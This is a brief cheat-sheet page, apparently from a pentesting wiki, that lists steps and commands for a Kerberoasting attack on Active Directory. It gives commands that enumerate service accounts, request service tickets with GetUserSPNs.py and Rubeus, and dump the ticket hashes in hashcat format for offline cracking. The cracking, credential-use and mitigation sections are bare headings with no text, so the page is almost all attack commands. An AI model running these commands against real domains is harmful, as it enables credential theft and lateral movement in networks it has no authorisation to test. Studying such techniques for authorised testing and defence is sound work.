kerberoasting-attack-steps-and-commands
Step 1: Enumerate Domain Users with SPN
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalNameGetUserSPNs.py -dc-ip <Domain_Controller_IP> <DOMAIN>/<User>:<Password>Step 2: Request a Ticket Granting Service (TGS) Ticket
GetUserSPNs.py -request -dc-ip <Domain_Controller_IP> <DOMAIN>/<User>:<Password>Rubeus.exe kerberoastStep 3: Extract and Save TGS Hashes
Rubeus.exe kerberoast /format:hashcatStep 4: Crack the TGS Hash Offline
Step 5: Use the Obtained Credentials
Mitigation Steps:
Last updated